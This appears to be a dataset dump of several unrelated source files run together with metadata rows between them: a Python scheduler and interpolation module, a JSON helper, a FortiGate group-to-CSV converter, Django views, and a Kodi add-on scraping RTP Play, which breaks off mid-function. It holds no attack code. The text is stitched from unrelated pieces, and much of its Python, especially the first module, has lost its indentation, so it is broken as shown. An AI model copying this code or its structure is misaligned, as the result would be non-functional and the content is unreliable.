interp_oscillate
"""
from time import time
from bisect import bisect
from math import cos, atan, exp
from random import randrange, expovariate
try:
from pygame.time import wait
except ImportError:
from time import sleep
def wait (t):
        # t is given in milliseconds; time.sleep takes seconds
        sleep(t / 1000.)
def ir (x):
"""Returns the argument rounded to the nearest integer."""
# this is about twice as fast as int(round(x))
y = int(x)
return (y + (x - y >= .5)) if x > 0 else (y - (y - x >= .5))
def _match_in_nest (obj, x):
"""Check if every object in a data structure is equal to some given object.
_match_in_nest(obj, x)
obj: data structure to look in: an arbitrarily nested list of lists.
x: object to compare to (not a list or tuple).
"""
if isinstance(obj, (tuple, list)):
        return all(_match_in_nest(o, x) for o in obj)
else:
return obj == x
def call_in_nest (f, *args):
"""Collapse a number of similar data structures into one.
Used in interp_* functions.
call_in_nest(f, *args) -> result
Each arg in args is a data structure of nested lists with a similar format (eg.
[1, 2, 3, [4, 5], []] and ['a', 'b', 'c', ['d', 'e'], []]). result is a new
structure in the same format with each non-list object the result of calling f
with the corresponding objects from each arg (eg. f = lambda n, c: str(n) + c
produces the result ['1a', '2b', '3c', ['4d', '5e'], []]).
One argument may have a list where others do not. In this case, those that do
not have the object in that place passed to f for each object in the (possibly
further nested) list in the argument that does. For example, given
[1, 2, [3, 4]], [1, 2, 3] and 1, result is
[f(1, 1, 1), f(2, 2, 1), [f(3, 3, 1), f(4, 3, 1)]]. However, in args with
lists, all lists must be the same length.
"""
is_list = [isinstance(arg, (tuple, list)) for arg in args]
if any(is_list):
n = len(args[is_list.index(True)])
# listify non-list args (assume all lists are the same length)
args = (arg if this_is_list else [arg] * n
for this_is_list, arg in zip(is_list, args))
return [call_in_nest(f, *inner_args) for inner_args in zip(*args)]
else:
return f(*args)
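# Example (added for illustration), matching the docstring above:
#
#     call_in_nest(lambda n, c: str(n) + c,
#                  [1, 2, 3, [4, 5], []],
#                  ['a', 'b', 'c', ['d', 'e'], []])
#     # -> ['1a', '2b', '3c', ['4d', '5e'], []]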
def _cmp_structure (x, y):
"""Find whether the (nested list) structure of two objects is the same."""
is_list = isinstance(x, (tuple, list))
if is_list != isinstance(y, (tuple, list)):
# one is a list, one isn't
return False
elif is_list:
# both are lists: check length and contents
return len(x) == len(y) and \
all(_cmp_structure(xi, yi) for xi, yi in zip(x, y))
else:
# neither is a list
return True
def interp_linear (*waypoints):
"""Linear interpolation for Scheduler.interp.
interp_linear(*waypoints) -> f
waypoints: each is (v, t) to set the value to v at time t. t can be omitted
for any but the last waypoint; the first is 0, and other gaps are
filled in with equal spacing. v is like the arguments taken by the
           call_in_nest function in this module, and we interpolate for each
           number in the nested list structure of v. Some objects in the v
           structures may be non-numbers, in which case they will not be varied
(maybe your function takes another argument you don't want to vary).
f: a function for which f(t) = v for every waypoint, with intermediate values
linearly interpolated between waypoints.
"""
# fill in missing times
vs = []
ts = []
last = waypoints[-1]
for w in waypoints:
if w is last or _cmp_structure(w, last):
vs.append(w[0])
ts.append(w[1])
else:
vs.append(w)
ts.append(None)
ts[0] = 0
# get groups with time = None
groups = []
group = None
for i, (v, t) in enumerate(zip(vs, ts)):
if t is None:
if group is None:
group = [i]
groups.append(group)
else:
if group is not None:
group.append(i)
group = None
# and assign times within those groups
for i0, i1 in groups:
t0 = ts[i0 - 1]
dt = float(ts[i1] - t0) / (i1 - (i0 - 1))
for i in xrange(i0, i1):
ts[i] = t0 + dt * (i - (i0 - 1))
interp_val = lambda r, v1, v2: (r * (v2 - v1) + v1) \
if isinstance(v1, (int, float)) else v1
def val_gen ():
t = yield
while 1:
# get waypoints we're between
i = bisect(ts, t)
if i == 0:
# before start
t = yield vs[0]
elif i == len(ts):
# past end: use final value, then end
t = yield vs[-1]
yield None # to avoid StopIteration issues
return
else:
v0 = vs[i - 1]
v1 = vs[i]
t0 = ts[i - 1]
t1 = ts[i]
# get ratio of the way between waypoints
r = 1 if t1 == t0 else (t - t0) / (t1 - t0) # t is always float
t = yield call_in_nest(interp_val, r, v0, v1)
# start the generator; get_val is its send method
g = val_gen()
g.next()
return g.send
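# Example (added for illustration): a value that moves from 0 to 10 over one
# second, then to 20 over the next second:
#
#     f = interp_linear(0, (10, 1), (20, 2))
#     f(.5)    # -> 5.0
#     f(1.5)   # -> 15.0
#
# Note that f is the stateful send method of a generator, so times should be
# passed in increasing order, as Scheduler.interp does.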
def interp_target (v0, target, damp, freq = 0, speed = 0, threshold = 0):
"""Move towards a target.
interp_target(v0, target, damp, freq = 0, speed = 0, threshold = 0) -> f
v0: the initial value (a structure of numbers like arguments to this module's
call_in_nest function). Elements which are not numbers are ignored.
target: the target value (has the same form as v0).
damp: rate we move towards the target (> 0).
freq: if damping is low, oscillation around the target can occur, and this
controls the frequency. If 0, there is no oscillation.
speed: if frequency is non-zero, this is the initial 'speed', in the same form
as v0.
threshold: stop when within this distance of the target, in the same form as
v0. If None, never stop. If varying more than one number, only
stop when every number is within its threshold.
f: function that returns position given the current time.
"""
if v0 == target: # nothing to do
return lambda t: None
    def get_phase (v0, target, speed):
if freq == 0 or not isinstance(v0, (int, float)) or v0 == target:
return 0
else:
return atan(-(float(speed) / (v0 - target) + damp) / freq)
phase = call_in_nest(get_phase, v0, target, speed)
def get_amplitude (v0, target, phase):
if isinstance(v0, (int, float)):
return (v0 - target) / cos(phase) # cos(atan(x)) is never 0
amplitude = call_in_nest(get_amplitude, v0, target, phase)
def get_val (t):
def interp_val (v0, target, amplitude, phase, threshold):
if not isinstance(v0, (int, float)):
return v0
# amplitude is None if non-number
if amplitude is None or v0 == target:
if threshold is not None:
return None
return v0
else:
dist = amplitude * exp(-damp * t)
if threshold is not None and abs(dist) <= threshold:
return None
return dist * cos(freq * t + phase) + target
rtn = call_in_nest(interp_val, v0, target, amplitude, phase, threshold)
if _match_in_nest(rtn, None):
# all done
rtn = None
return rtn
return get_val
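# Note (added for clarity): for a scalar component the value above follows a
# damped oscillation,
#     v(t) = target + A * exp(-damp * t) * cos(freq * t + phase),
# with A and phase chosen so that v(0) = v0 and v'(0) = speed.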
def interp_shake (centre, amplitude = 1, threshold = 0, signed = True):
"""Shake randomly.
interp_shake(centre, amplitude = 1, threshold = 0, signed = True) -> f
centre: the value to shake about; a nested list (a structure of numbers like
arguments to this module's call_in_nest function). Elements which are
not numbers are ignored.
amplitude: a number to multiply the value by. This can be a function that
takes the elapsed time in seconds to vary in time. Has the same
form as centre (return value if a function).
threshold: stop when amplitude is this small. If None, never stop. If varying
more than one number, only stop when every number is within its
threshold.
signed: whether to shake around the centre. If False, values are greater than
        centre (note that amplitude may be signed).
f: function that returns position given the current time.
"""
def get_val (t):
def interp_val (centre, amplitude, threshold):
if not isinstance(centre, (int, float)):
return centre
if threshold is not None and abs(amplitude) <= threshold:
return None
val = amplitude * expovariate(1)
if signed:
val *= 2 * randrange(2) - 1
return centre + val
a = amplitude(t) if callable(amplitude) else amplitude
rtn = call_in_nest(interp_val, centre, a, threshold)
if _match_in_nest(rtn, None):
# all done
rtn = None
return rtn
return get_val
def interp_round (get_val, do_round = True):
"""Round the output of an existing interpolation function to integers.
interp_round(get_val, do_round = True) -> f
get_val: the existing function. The values it returns are as the arguments
taken by the call_in_nest function in this module.
do_round: determines which values to round. This is in the form of the values
get_val returns, a structure of lists and booleans corresponding to
each number in get_val. Any list in this structure can be replaced
by a single boolean to apply to the entire (nested) list. Non-number
objects in the value's structure are ignored.
f: the get_val wrapper that rounds the returned value.
"""
def round_val (do, v):
return ir(v) if isinstance(v, (int, float)) and do else v
def round_get_val (t):
return call_in_nest(round_val, do_round, get_val(t))
return round_get_val
def interp_repeat (get_val, period, t_min = 0, t_start = None):
"""Repeat an existing interpolation function.
interp_repeat(get_val, period, t_min = 0, t_start = t_min) -> f
get_val: an existing interpolation function, as taken by Scheduler.interp.
Times passed to the returned function are looped around to fit in the range
[t_min, t_min + period), starting at t_start, and the result is passed to
get_val.
f: the get_val wrapper that repeats get_val over the given period.
"""
if t_start is None:
t_start = t_min
return lambda t: get_val(t_min + (t_start - t_min + t) % period)
def interp_oscillate (get_val, t_max, t_min = 0, t_start = None):
"""Repeat a linear oscillation over an existing interpolation function.
interp_oscillate(get_val, t_max, t_min = 0, t_start = t_min) -> f
get_val: an existing interpolation function, as taken by Scheduler.interp.
Times passed to the returned function are looped and reversed to fit in the
range [t_min, t_max), starting at t_start. If t_start is in the range
[t_max, 2 * t_max - t_min), it is mapped to the 'return journey' of the
oscillation.
f: the generated get_val wrapper.
"""
if t_start is None:
t_start = t_min
period = t_max - t_min
def osc_get_val (t):
t = (t_start - t_min + t) % (2 * period)
if t >= period:
t = 2 * period - t
return get_val(t_min + t)
return osc_get_val
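# Combined sketch (added for illustration): wrapping interp_linear with
# interp_oscillate gives a value that bounces between two endpoints:
#
#     f = interp_oscillate(interp_linear(0, (10, 1)), t_max = 1)
#     f(.5)    # -> 5.0
#     f(1.5)   # -> 5.0 again, on the return journey
#
# (interp_linear returns a stateful generator method, so in practice such a
# function is driven by Scheduler.interp with increasing times.)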
class Timer (object):
"""Simple timer.
Either call run once and stop if you need to, or step every time you've done
what you need to.
CONSTRUCTOR
Timer(fps = 60)
fps: frames per second to aim for.
METHODS
run
step
stop
ATTRIBUTES
fps: the current target FPS. Set this directly.
frame: the current length of a frame in seconds.
t: the time at the last step, if using individual steps.
"""
def __init__ (self, fps = 60):
self.fps = fps
self.t = time()
def run (self, cb, *args, **kwargs):
"""Run indefinitely or for a specified amount of time.
run(cb, *args[, seconds][, frames]) -> remain
cb: a function to call every frame.
args: extra arguments to pass to cb.
seconds, frames: keyword-only arguments that determine how long to run for. If
seconds is passed, frames is ignored; if neither is given, run
forever (until Timer.stop is called). Either can be a float.
Time passed is based on the number of frames that have passed,
so it does not necessarily reflect real time.
remain: the number of frames/seconds left until the timer has been running for
the requested amount of time (or None, if neither were given). This
may be less than 0 if cb took a long time to run.
"""
self.stopped = False
seconds = kwargs.get('seconds')
frames = kwargs.get('frames')
if seconds is not None:
seconds = max(seconds, 0)
elif frames is not None:
frames = max(frames, 0)
# main loop
t0 = time()
while 1:
frame = self.frame
cb(*args)
t = time()
t_gone = min(t - t0, frame)
if self.stopped:
if seconds is not None:
return seconds - t_gone
elif frames is not None:
return frames - t_gone / frame
else:
return None
t_left = frame - t_gone # until next frame
if seconds is not None:
t_left = min(seconds, t_left)
elif frames is not None:
t_left = min(frames, t_left / frame)
if t_left > 0:
wait(int(1000 * t_left))
t0 = t + t_left
else:
t0 = t
if seconds is not None:
seconds -= t_gone + t_left
if seconds <= 0:
return seconds
elif frames is not None:
frames -= (t_gone + t_left) / frame
if frames <= 0:
return frames
def step (self):
"""Step forwards one frame."""
t = time()
t_left = self.t + self.frame - t
if t_left > 0:
wait(int(1000 * t_left))
self.t = t + t_left
else:
self.t = t
def stop (self):
"""Stop any current call to Timer.run."""
self.stopped = True
@property
def fps (self):
return self._fps
@fps.setter
def fps (self, fps):
self._fps = int(round(fps))
self.frame = 1. / fps
class Scheduler (Timer):
"""Simple event scheduler (Timer subclass).
Takes the same arguments as Timer.
METHODS
add_timeout
rm_timeout
interp
interp_simple
"""
def __init__ (self, fps = 60):
Timer.__init__(self, fps)
self._cbs = {}
self._max_id = 0
def run (self, seconds = None, frames = None):
"""Start the scheduler.
run([seconds][, frames]) -> remain
Arguments and return value are as for Timer.run.
"""
return Timer.run(self, self._update, seconds = seconds,
frames = frames)
def step (self):
self._update()
Timer.step(self)
def add_timeout (self, cb, *args, **kwargs):
"""Call a function after a delay.
add_timeout(cb, *args[, seconds][, frames][, repeat_seconds][, repeat_frames])
-> ID
cb: the function to call.
args: list of arguments to pass to cb.
seconds: how long to wait before calling, in seconds (respects changes to FPS).
If passed, frames is ignored.
frames: how long to wait before calling, in frames (same number of frames even
if FPS changes).
repeat_seconds, repeat_frames:
how long to wait between calls; time is determined as for the seconds and
frames arguments. If repeat_seconds is passed, repeat_frames is ignored;
if neither is passed, the initial time delay is used between calls.
ID: an ID to pass to rm_timeout. This is guaranteed to be unique over time.
Times can be floats, in which case part-frames are carried over, and time
between calls is actually an average over a large enough number of frames.
The called function can return a boolean True object to repeat the timeout;
otherwise it will not be called again.
"""
seconds = kwargs.get('seconds')
frames = kwargs.get('frames')
repeat_seconds = kwargs.get('repeat_seconds')
repeat_frames = kwargs.get('repeat_frames')
if seconds is not None:
frames = None
if repeat_seconds is not None:
repeat_frames = None
elif repeat_frames is None:
repeat_seconds = seconds
repeat_frames = frames
self._cbs[self._max_id] = [seconds, frames, repeat_seconds,
repeat_frames, cb, args]
self._max_id += 1
# ID is key in self._cbs
return self._max_id - 1
def rm_timeout (self, *ids):
"""Remove the timeouts with the given IDs."""
for i in ids:
try:
del self._cbs[i]
except KeyError:
pass
def _update (self):
"""Handle callbacks this frame."""
cbs = self._cbs
frame = self.frame
# cbs might add/remove cbs, so use items instead of iteritems
for i, data in cbs.items():
if i not in cbs:
# removed since we called .items()
continue
if data[0] is not None:
remain = 0
dt = frame
else:
remain = 1
dt = 1
data[remain] -= dt
if data[remain] <= 0:
# call callback
if data[4](*data[5]):
# add on delay
total = 0 if data[2] is not None else 1
data[not total] = None
data[total] += data[total + 2]
elif i in cbs: # else removed in above call
del cbs[i]
def interp (self, get_val, set_val, t_max = None, val_min = None,
val_max = None, end = None, round_val = False,
multi_arg = False):
"""Vary a value over time.
interp(get_val, set_val[, t_max][, val_min][, val_max][, end],
round_val = False, multi_arg = False) -> timeout_id
get_val: a function called with the elapsed time in seconds to obtain the
current value. If this function returns None, the interpolation will
be canceled. The interp_* functions in this module can be used to
construct such functions. The value must actually be a list of
arguments to pass to set_val (unless set_val is (obj, attr)).
set_val: a function called with the current value to set it. This may also be
an (obj, attr) tuple to do obj.attr = val.
t_max: if time becomes larger than this, cancel the interpolation.
val_min, val_max: minimum and maximum values of the interpolated value. If
given, get_val must only return values that can be compared
with these. If the value ever falls outside of this range,
set_val is called with the value at the boundary it is beyond
(val_min or val_max) and the interpolation is canceled.
end: used to do some cleanup when the interpolation is canceled (when get_val
returns None or t_max, val_min or val_max comes into effect, but not when
the rm_timeout method is called with the returned id). This can be a
final value to pass to set_val, or a function to call without arguments.
If the function returns a (non-None) value, set_val is called with it.
round_val: whether to round the value(s) (see the interp_round function in this
module for other possible values).
multi_arg: whether values should be interpreted as lists of arguments to pass
to set_val instead of a single list argument.
timeout_id: an identifier that can be passed to the rm_timeout method to remove
the callback that continues the interpolation. In this case the
end argument is not respected.
"""
if round_val:
get_val = interp_round(get_val, round_val)
if not callable(set_val):
obj, attr = set_val
set_val = lambda val: setattr(obj, attr, val)
def timeout_cb ():
t = 0
last_v = None
done = False
while 1:
t += self.frame
v = get_val(t)
if v is None:
done = True
# check bounds
elif t_max is not None and t > t_max:
done = True
else:
if val_min is not None and v < val_min:
done = True
v = val_min
elif val_max is not None and v > val_max:
done = True
v = val_max
if v != last_v:
set_val(*v) if multi_arg else set_val(v)
last_v = v
if done:
# canceling for some reason
if callable(end):
v = end()
else:
v = end
# set final value if want to
if v is not None and v != last_v:
set_val(*v) if multi_arg else set_val(v)
yield False
# just in case we get called again (should never happen)
return
else:
yield True
return self.add_timeout(timeout_cb().next, frames = 1)
def interp_simple (self, obj, attr, target, t, end_cb = None,
round_val = False):
"""A simple version of the interp method.
Varies an object's attribute linearly from its current value to a target value
in a set amount of time.
    interp_simple(obj, attr, target, t[, end_cb], round_val = False) -> timeout_id
obj, attr: this function varies the attribute attr of the object obj.
target: a target value, in the same form as the current value in the given
attribute.
t: the amount of time to take to reach the target value.
end_cb: a function to call when the target value has been reached.
round_val: whether to round the value(s) (see the interp_round function in this
module for other possible values).
timeout_id: an identifier that can be passed to the rm_timeout method to remove
the callback that continues the interpolation. In this case end_cb
is not called.
"""
get_val = interp_linear(getattr(obj, attr), (target, t))
        return self.interp(get_val, (obj, attr), end = end_cb, round_val = round_val)
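# Minimal usage sketch (added for illustration; not part of the original
# module -- 'Sprite' is a hypothetical stand-in for any object with a numeric
# attribute):
if __name__ == '__main__':
    class Sprite (object):
        x = 0.

    s = Sprite()
    sched = Scheduler(fps = 60)
    # vary s.x linearly from 0 to 100 over 2 seconds, then stop the loop
    sched.interp_simple(s, 'x', 100., 2., end_cb = sched.stop)
    sched.run(seconds = 3)
    print 's.x is now %s' % s.x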
|
gpl-3.0
| 7,478,932,857,420,847,000
| 33.035971
| 141
| 0.581695
| false
| 3.86078
| false
| false
| false
|
walterbender/yupana
|
utils.py
|
1
|
1166
|
#Copyright (c) 2011,12 Walter Bender
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# You should have received a copy of the GNU General Public License
# along with this library; if not, write to the Free Software
# Foundation, 51 Franklin Street, Suite 500 Boston, MA 02110-1335 USA
from StringIO import StringIO
import json
from json import load as jload
from json import dump as jdump
def json_load(text):
""" Load JSON data using what ever resources are available. """
    # wrap the text in a file-like object so the json loader can read it
io = StringIO(text)
try:
listdata = jload(io)
except ValueError:
# assume that text is ascii list
listdata = text.split()
for i, value in enumerate(listdata):
listdata[i] = int(value)
return listdata
def json_dump(data):
""" Save data using available JSON tools. """
_io = StringIO()
jdump(data, _io)
return _io.getvalue()
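# Round-trip sketch (added for illustration; not part of the original module):
#
#     >>> json_load(json_dump([1, 2, 3]))
#     [1, 2, 3]
#     >>> json_load('1 2 3')  # plain ascii list fallback
#     [1, 2, 3]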
|
gpl-3.0
| 2,220,261,143,581,196,300
| 29.684211
| 70
| 0.698971
| false
| 4.006873
| false
| false
| false
|
maaaaz/fgpoliciestocsv
|
fggroupstocsv.py
|
1
|
6311
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of fgpoliciestocsv.
#
# Copyright (C) 2014, 2020, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# fgpoliciestocsv is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# fgpoliciestocsv is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with fgpoliciestocsv. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from os import path
import io
import sys
import re
import csv
import os
# OptionParser imports
from optparse import OptionParser
from optparse import OptionGroup
# Options definition
parser = OptionParser(usage="%prog [options]")
main_grp = OptionGroup(parser, 'Main parameters')
main_grp.add_option('-i', '--input-file', help='Partial or full Fortigate configuration file. Ex: fgfw.cfg')
main_grp.add_option('-o', '--output-file', help='Output csv file (default ./groups-out.csv)', default=path.abspath(path.join(os.getcwd(), './groups-out.csv')))
main_grp.add_option('-s', '--skip-header', help='Do not print the csv header', action='store_true', default=False)
main_grp.add_option('-n', '--newline', help='Insert a newline between each group for better readability', action='store_true', default=False)
main_grp.add_option('-d', '--delimiter', help='CSV delimiter (default ";")', default=';')
main_grp.add_option('-e', '--encoding', help='Input file encoding (default "utf8")', default='utf8')
parser.option_groups.extend([main_grp])
# Python 2 and 3 compatibility
if (sys.version_info < (3, 0)):
fd_read_options = 'r'
fd_write_options = 'wb'
else:
fd_read_options = 'r'
fd_write_options = 'w'
# Handful patterns
# -- Entering group definition block
p_entering_group_block = re.compile(r'^\s*config firewall addrgrp$', re.IGNORECASE)
# -- Exiting group definition block
p_exiting_group_block = re.compile(r'^end$', re.IGNORECASE)
# -- Committing the current group definition and going to the next one
p_group_next = re.compile(r'^next$', re.IGNORECASE)
# -- Policy number
p_group_name = re.compile(r'^\s*edit\s+"(?P<group_name>.*)"$', re.IGNORECASE)
# -- Policy setting
p_group_set = re.compile(r'^\s*set\s+(?P<group_key>\S+)\s+(?P<group_value>.*)$', re.IGNORECASE)
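# Illustrative sample (added for clarity; not from the original source) of the
# block these patterns walk through:
#
#   config firewall addrgrp
#       edit "g-dmz-servers"
#           set member "host-web" "host-db"
#           set comment "DMZ servers"
#       next
#   end
#
# p_group_name captures group_name='g-dmz-servers'; p_group_set captures
# ('member', '"host-web" "host-db"') and ('comment', '"DMZ servers"'), with
# the quotes stripped later in parse().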
# Functions
def parse(options):
"""
Parse the data according to several regexes
@param options: options
@rtype: return a list of groups ( [ {'id' : '1', 'srcintf' : 'internal', ...}, {'id' : '2', 'srcintf' : 'external', ...}, ... ] )
and the list of unique seen keys ['id', 'srcintf', 'dstintf', ...]
"""
global p_entering_group_block, p_exiting_group_block, p_group_next, p_group_name, p_group_set
in_group_block = False
group_list = []
group_elem = {}
order_keys = []
with io.open(options.input_file, mode=fd_read_options, encoding=options.encoding) as fd_input:
for line in fd_input:
line = line.strip()
# We match a group block
if p_entering_group_block.search(line):
in_group_block = True
# We are in a group block
if in_group_block:
if p_group_name.search(line):
group_name = p_group_name.search(line).group('group_name')
group_elem['name'] = group_name
if not('name' in order_keys): order_keys.append('name')
# We match a setting
if p_group_set.search(line):
group_key = p_group_set.search(line).group('group_key')
if not(group_key in order_keys): order_keys.append(group_key)
group_value = p_group_set.search(line).group('group_value').strip()
group_value = re.sub('["]', '', group_value)
group_elem[group_key] = group_value
# We are done with the current group id
if p_group_next.search(line):
group_list.append(group_elem)
group_elem = {}
# We are exiting the group block
if p_exiting_group_block.search(line):
in_group_block = False
return (group_list, order_keys)
def generate_csv(results, keys, options):
"""
Generate a plain ';' separated csv file
"""
if results and keys:
with io.open(options.output_file, mode=fd_write_options) as fd_output:
spamwriter = csv.writer(fd_output, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n')
if not(options.skip_header):
spamwriter.writerow(keys)
for group in results:
output_line = []
for key in keys:
if key in group.keys():
if "member" == key:
output_line.append("\n".join(group[key].split(" ")))
else:
output_line.append(group[key])
else:
output_line.append('')
spamwriter.writerow(output_line)
if options.newline:
spamwriter.writerow('')
fd_output.close()
return None
def main():
"""
Dat main
"""
global parser
options, arguments = parser.parse_args()
if (options.input_file == None):
parser.error('Please specify a valid input file')
results, keys = parse(options)
generate_csv(results, keys, options)
return None
if __name__ == "__main__" :
main()
|
gpl-3.0
| 8,581,508,258,251,817,000
| 34.857955
| 159
| 0.58501
| false
| 3.881304
| false
| false
| false
|
anshulkgupta/viznow
|
gary/mhacks/views.py
|
1
|
1927
|
import os
import json
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
#from mhacks.equities import Field
EQUITY_MAP = {
'AAPL': 'AAPL US EQUITY'
}
def home_page(request):
return render(request, 'home.html')
def uber_page(request):
return render(request, 'final_uber.html')
def enter_page(request):
return render(request, 'enter.html')
def airline_page(request):
return render(request, 'flightanimation.html')
def bubble_page(request):
return render(request, 'custom_final_bubble.html')
def globe_page(request):
return render(request, 'custom_final_globe.html')
def chord_page(request):
return render(request, 'custom_final_chord.html')
def line_page(request):
return render(request, 'custom_final_line.html')
def chloropleth_page(request):
return render(request, 'custom_final_chloropleth.html')
def final_custom_page(request, page, id):
return render(request, 'custom_final.html', {'page' : page, 'id': id})
def fileupload_page(request, page, id):
return render(request, 'fileupload.html', {'page' : page, 'id': id})
def upload_page(request):
return render(request, 'upload1.html')
def upload_unique_page(request, id):
return render(request, 'upload_unique.html', {'page' : id})
def visualization_page(request, page, id):
return render(request, 'visualization.html', {'page': page, 'id': id})
@csrf_exempt
def handle_upload(request):
#equities = request.post['equities']
#str_param = EQUITY_MAP.get(equities)
root = os.path.dirname(__file__)
json_file = '%s/equities/fixtures/newstock.json' % root
json_data = open(json_file).read()
equities = json.loads(json_data.replace('\n', ''))
#field = Field(str_param)
#return HttpResponse(field.getData(), content_type="application/json")
return JsonResponse(equities)
|
mit
| -4,921,216,448,401,089,000
| 27.776119
| 72
| 0.728075
| false
| 3.148693
| false
| false
| false
|
marcela2/minhatv
|
plugin.video.rtpplay/resources/ondemand.py
|
1
|
9380
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Author: enen92
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import xbmc,xbmcgui,xbmcaddon,xbmcplugin,xbmcvfs,sys,os,re
from common_variables import *
from directory import *
from webutils import *
from utilities import *
from resolver import *
from rtpplayer import *
from iofile import *
def list_tv_shows(name,url):
try:
page_source = abrir_url(url)
except:
page_source = ''
msgok(translate(30001),translate(30018))
if page_source:
match=re.compile('<a class="text-white" href="(.+?)" title=".+?">(.+?)</a>').findall(page_source)
totalit= len(match)
for urlsbase,titulo in match:
titulo = title_clean_up(titulo)
if selfAddon.getSetting('icon_plot') == 'true':
try:
html_source = abrir_url(base_url + urlsbase)
except: html_source = ''
if html_source:
try: thumbnail=re.compile('<img class="pull-left" src="(.+?)"').findall(html_source)[0]
except: thumbnail=''
sinopse= re.findall('id="promo">.+?\n.+?<p>(.*?)</p>', html_source, re.DOTALL)
if sinopse: information = { "Title": name,"plot": clean_html(title_clean_up(sinopse[0])) }
else: information = { "Title": name,"plot":translate(30026) }
addprograma(titulo,base_url + urlsbase,16,thumbnail,totalit,information)
else:
information = { "Title": name,"plot":translate(30026) }
thumbnail = ''
addprograma(titulo,base_url + urlsbase,15,thumbnail,totalit,information)
xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
setview('show-view')
else:
sys.exit(0)
def list_episodes(name,url,plot):
program_name = name.split('|')
if len(program_name) > 1: titulo = program_name[1].replace('[/COLOR]','').replace('[/B]','')
else: titulo = name
prog_id=re.compile('http://www.rtp.pt/play/p(.+?)/').findall(url)
if not prog_id: prog_id=re.compile('listProgram=(\d+)&').findall(url)
page_num = re.compile('&page=(\d+)&').findall(url)
if not page_num: current_page = '1'
else: current_page = page_num[0]
if ('recent' not in url) and ('popular' not in url) and ('procura?' not in url):
url='http://www.rtp.pt/play/bg_l_ep/?listDate=&listQuery=&listProgram='+prog_id[0]+'&listcategory=&listchannel=&listtype=recent&page='+current_page+'&type=all'
else:pass
print url
try:
source = abrir_url(url)
except: source=''; msgok(translate(30001),translate(30018))
if source:
match_geral = re.findall('<div class="lazy(.*?)</i></span>',source,re.DOTALL)
if match_geral:
totalit = len(match_geral)
for match in match_geral:
data = re.compile('<span class="small clearfix text-light">(.+?)</span>').findall(match)
lnk = re.compile('href="(.+?)" ').findall(match)
titulo_array = re.compile('title="(.+?)" ').findall(match)
if titulo_array:
if 'itemprop' not in titulo_array[0]:
titulo = title_clean_up(titulo_array[0])
img_tmp = re.compile('itemprop="image" src=".+?src=(.+?)&.+?"').findall(match)
if img_tmp: img = img_base_url + img_tmp[0]
else: img = ''
if data and lnk:
information = { "Title": titulo,"plot":plot,"aired":format_data(data[0]) }
addepisode('[B]' + titulo + '[COLOR blue] (' + title_clean_up(data[0]) +')' + '[/B][/COLOR]',base_url + lnk[0],17,img,totalit,information)
try:
next_url = 'http://www.rtp.pt/play/bg_l_ep/?listDate=&listQuery=&listProgram='+prog_id[0]+'&listcategory=&listchannel=&listtype=recent&page='+str(int(current_page)+1)+'&type=all'
try: source_next = abrir_url(next_url)
except: source_next = ''
if source_next:
if re.findall('itemscope itemtype="http://schema.org/TVSeries"',source_next):
addDir('[B][COLOR blue]'+translate(30028)+'|[/B][/COLOR]'+titulo,next_url,16,os.path.join(artfolder,'next.png'),1,pasta=True,informacion=information)
except: pass
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
setview('episodes-view')
def list_emissoes(urltmp):
try:
page_source = abrir_url(urltmp)
except:
page_source = ''
msgok(translate(30001),translate(30018))
if page_source:
program_list=re.findall('<section>(.+?)</section>',page_source,re.DOTALL)
if program_list:
match = re.findall('href="(.+?)".*?itemprop="name">(.+?)</b',program_list[1],re.DOTALL)
if match:
totalit = len(match)
for urlsbase,titulo in match:
if selfAddon.getSetting('icon_plot') == 'true':
try:
source = abrir_url(base_url + urlsbase)
sinopse=re.findall('id="promo">.+?\n.+?<p>(.*?)</p>', source, re.DOTALL)
if sinopse: plot = clean_html(title_clean_up(sinopse[0]))
information={ "Title": title_clean_up(titulo),"plot":plot }
try: thumbnail=img_base_url + re.compile('src=(.+?)&').findall(source)[0]
except: thumbnail=''
except: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
else: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
addepisode(title_clean_up(titulo),base_url + urlsbase,17,thumbnail,totalit,information)
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
setview('episodes-view')
else: msgok(translate(30001),translate(30032));sys.exit(0)
def pesquisa_emissoes():
if not xbmcvfs.exists(os.path.join(datapath,'searchemiss.txt')):
keyb = xbmc.Keyboard('', translate(30031))
keyb.doModal()
if (keyb.isConfirmed()):
search = keyb.getText()
encode=urllib.quote(search)
urltmp = base_url + '/play/pesquisa?c_t=&q=' + encode
save(os.path.join(datapath,'searchemiss.txt'),urltmp)
list_emissoes(urltmp)
else:
text = readfile(os.path.join(datapath,'searchemiss.txt'))
list_emissoes(text)
def pesquisa_programas():
if not xbmcvfs.exists(os.path.join(datapath,'searchprog.txt')):
keyb = xbmc.Keyboard('', translate(30031))
keyb.doModal()
if (keyb.isConfirmed()):
search = keyb.getText()
encode=urllib.quote(search)
urltmp = base_url + '/play/pesquisa?c_t=&q=' + encode
save(os.path.join(datapath,'searchprog.txt'),urltmp)
list_show_search(urltmp)
else:
